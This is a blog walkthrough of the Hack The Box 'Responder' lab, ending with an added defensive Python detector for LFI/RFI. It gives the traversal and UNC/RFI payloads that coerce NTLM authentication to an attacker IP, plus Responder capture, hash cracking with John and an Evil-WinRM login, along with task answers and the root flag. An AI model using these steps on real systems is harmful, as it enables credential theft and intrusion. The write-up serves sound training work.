HTB Labs — Tier 1 — “Responder” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Welcome to a new walkthrough powered by HTB, Tier 1, named “Responder”. The Responder machine is designed to introduce fundamental concepts of web application vulnerabilities, NTLM authentication abuse, and cross-service exploitation in Windows environments. This lab demonstrates how a seemingly simple Local and Remote File Inclusion vulnerability can be chained with NTLM authentication leakage to fully compromise a Windows host.
Executive Summary
Here is an executive summary of the steps we will follow:
Stage I: Scanning
Initial reconnaissance was performed to identify exposed services and understand the target’s attack surface. Network scanning revealed two primary open services: HTTP on port 80 and WinRM (WSMan) on port 5985, indicating a Windows-based system.
Stage II: Enumeration
Web enumeration revealed a language-switching feature controlled by a page URL parameter, which was found to be vulnerable to Local File Inclusion (LFI). By exploiting this flaw, sensitive local system files could be accessed, confirming improper input validation. Further testing identified that the application also accepted remote file paths, indicating a potential Remote File Inclusion (RFI) condition.
When attempting to load remote resources, the server initiated an authentication request, exposing the use of NTLM authentication. This behaviour revealed an opportunity to capture NTLM challenge-response hashes by forcing the server to authenticate to an attacker-controlled host.
Stage III: Exploiting
Exploitation was achieved by leveraging the RFI vulnerability to trigger outbound NTLM authentication requests from the target server. By running Responder on the attacker machine, a NetNTLMv2 hash for the Administrator account was successfully captured. The hash was then cracked offline using John the Ripper, revealing the Administrator password.
With valid credentials obtained, remote access to the system was established using Evil-WinRM over port 5985. This provided an interactive PowerShell session on the target machine, allowing full system access and enabling retrieval of the root flag.
Let’s not waste more time on the introduction and begin hacking in detail!
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my earlier blog post, which guides you step by step through connecting to the target machine.
Step 2: Spawning the Machine and Starting to Solve the Tasks.
Task 1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
Answer: Unika.htb
Walkthrough:
When you type the machine's IP address into the browser, you will notice that it redirects you to http://unika.htb

Since scanning the target is normally the first step we take to understand the nature of the web application, we will use the NmapAutomator tool to get a better picture of the target.

The scan shows two services running:
- The first service is HTTP, running on port 80
- The second service is WSMan, running on port 5985. This suggests the web server is a Windows host.
Task 2: Which scripting language is being used on the server to generate web pages?
Answer: PHP
Walkthrough:
You can identify the server-side scripting language with the curl command. Run the following and inspect the response headers:
curl -I 10.129.8.213
Task 3: What is the name of the URL parameter which is used to load different language versions of the web page?
Answer: page
Walkthrough:
There isn't one single universal name for this kind of URL parameter; it is generally called a language (or locale) parameter, and developers choose their own names. To identify the parameter used in our case, first add an entry to /etc/hosts that maps the machine IP to the domain the web service redirects to (unika.htb, from Task 1).
Edit the /etc/hosts file with nano as shown in the following screenshot:

After adding the entry, browse to unika.htb and you will see the web page load.

After viewing the web page and switching the language from English to another language, you will find that the URL parameter that selects the language is called "page".
Task 4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer: ../../../../../../../../windows/system32/drivers/etc/hosts
Walkthrough:
LFI (Local File Inclusion) is a web vulnerability where an attacker can make a website load files from the server’s local filesystem by manipulating input (often a URL parameter).
LFI lets an attacker read or execute local files on the server that were never meant to be accessible.
In our task, the question tests whether you can manipulate the URL parameter so that the server responds with sensitive information that is not meant to be disclosed. As you can see on the web page, the URL is:
http://unika.htb/index.php?page=french.html
The idea behind the question is to see which of the four values, when substituted for the current value of the parameter "page", will cause sensitive information to be disclosed. As per the task, the four values are:
1- ../../../../../../../../windows/system32/drivers/etc/hosts
2- minikatz.exe
3- french.html
4- //10.10.14.6/somefile
The answer is the first value. Changing the value of the parameter "page" from "french.html" to "../../../../../../../../windows/system32/drivers/etc/hosts" sends a request that asks the server to include the file at that path.
The server resolves the path given in the value of the parameter "page" on its own filesystem, and as a result it responds with the contents of the "hosts" file, as shown in the following screenshot.

Task 5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer: //10.10.14.6/somefile
Walkthrough:
You need to know the main differences between LFI and RFI. Take a look at this table for a better overview:

Based on the differences between LFI and RFI, the correct answer will be //10.10.14.6/somefile.
Note that you will need to replace the IP address with the address of your own machine, or of whichever remote server you are using.

As per the screenshot, the server tells us the action is not permitted and denied, which means there is an authentication process running on this server when it tries to reach a remote path.
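As an added defender-side example (not part of the original walkthrough), the following Python classifies values of the page parameter the way Tasks 4 and 5 distinguish LFI from RFI, flags them in constructed web-server access-log lines, and shows the allowlist-plus-realpath check that would have stopped the include in the first place. The allowlist, PAGES_DIR and the log lines are assumptions.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allowlist and page directory; the lab only shows french.html via index.php?page=...
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}
PAGES_DIR = "/var/www/html/pages"  # assumed location, not taken from the lab

# Constructed access-log lines (not captured from the lab); the requests mirror the task values.
SAMPLE_LOG = """\
10.10.14.6 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 5120
10.10.14.6 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824
10.10.14.6 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1" 500 0
10.10.14.6 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fwindows%5cwin.ini HTTP/1.1" 200 92
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

def classify_page_value(value: str) -> str:
    """Label a page= value: allowed, rfi (remote/UNC path), lfi (traversal/absolute local path) or unknown."""
    v = unquote(unquote(value))  # second decode catches double-encoded traversal
    if v in ALLOWED_PAGES:
        return "allowed"
    if v.startswith(("//", "\\\\")) or SCHEME_RE.match(v):
        return "rfi"  # //host/share or scheme://host makes the include fetch a remote resource
    if ".." in v or v.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", v):
        return "lfi"  # walks out of the page directory on the local filesystem
    return "unknown"  # off the allowlist but with no traversal or remote marker

def flag_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (verdict, value) for every page= value in the log that is not allowlisted."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for value in parse_qs(urlsplit(m.group(1)).query).get("page", []):
            verdict = classify_page_value(value)
            if verdict != "allowed":
                findings.append((verdict, value))
    return findings

def resolve_page(value: str) -> Optional[str]:
    """Hardened include: allowlist first, then confirm the real path still lives under PAGES_DIR."""
    if value not in ALLOWED_PAGES:
        return None
    full = os.path.realpath(os.path.join(PAGES_DIR, value))
    return full if os.path.commonpath([full, PAGES_DIR]) == PAGES_DIR else None
```

Running flag_log(SAMPLE_LOG) returns the two traversal requests as lfi and the UNC path as rfi, while resolve_page rejects anything that is not on the allowlist.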
Task 6: What does NTLM stand for?
Answer: New Technology Lan Manager
Walkthrough:
It is worth mentioning that NTLM is a legacy authentication protocol developed by Microsoft for Windows networks. It was used primarily in Windows NT and early Active Directory environments to verify user identities without sending plaintext passwords over the network.
NTLM is still supported for backward compatibility, but it is outdated and insecure for modern enterprise environments.
Task 7: Which flag do we use in the Responder utility to specify the network interface?
Answer: -I
Walkthrough:
In Responder, the flag used to specify the network interface is -I. If we are listening for events on eth0, we pass the eth0 interface; if we are connected over VPN, we pass tun0 or whichever interface we are using:
sudo responder -I tun0
To identify the network interfaces on your system, run one of the following commands:
ifconfig or ip a
Task 8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?
Answer: John The Ripper
Walkthrough:
John The Ripper is a password-cracking tool. It is commonly used to crack NetNTLMv2 challenge/response hashes and performs dictionary and brute-force attacks.
Task 9: What is the password for the administrator user?
Answer: badminton
Walkthrough:
Let's recap the findings so far to understand how we can obtain the administrator password and the machine flag.
First: the scan suggests the target is running Windows Server.
Second: during enumeration we found that the web server is vulnerable to LFI, which lets us read files hosted on the target server. The web server is also likely vulnerable to RFI, which would let it include files from remote servers.
Third: the Windows server attempts an authentication whenever it is asked to load a file from a remote server.
Based on the information gathered so far, we will try to identify the type of authentication running on the server. To do so, we will use Responder to listen for incoming events on the IP address bound to our network interface. When the target is asked to load a file from our machine, it will try to authenticate that action and send us a response.

Based on what we stated, we will run Responder on our machine and monitor incoming events from the target web server while changing the URL to:
http://unika.htb/index.php?page=//10.10.14.192/somefile

Responder will keep running in the background and give us more insight into the authentication in use. It will also provide more information about the web server, along with the credentials needed to access it.

Using John The Ripper, we will crack the hash. Copy the hash starting from "Administrator", paste it into a text file, and use the following command to brute-force it with a wordlist:
john -w=/usr/share/wordlists/rockyou.txt "Hash File location"
You will find that the password of "Administrator" is "badminton".
Task 10: We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Answer: 5985
Walkthrough:
As per the scan we performed in the first step, there is a service called "wsman" running on port 5985. We will use a tool called Evil-WinRM. It is a post-exploitation / remote access tool used in penetration testing to get an interactive PowerShell shell on a Windows machine via WinRM (Windows Remote Management).

Task 11: Submit The Root Flag
Answer: ea81b7afddd03efaa0945333ed147fac
Walkthrough:
Using the Evil-WinRM tool, we will get remote access to the Windows server. Run the following command:
evil-winrm -i 10.129.95.234 -u administrator -p badminton
After connecting, move up two directories until you reach the Users directory, then go into the directory of the user called "mike", and then into his Desktop. You will find flag.txt there.

Note that you can view the content of the flag using the command "type flag.txt".
The root flag of the machine is “ea81b7afddd03efaa0945333ed147fac”
Hope you enjoyed reading my blog about solving the “Responder” machine from HTB — Tier 1 — Starting Point Phase.
See you in another write-up!


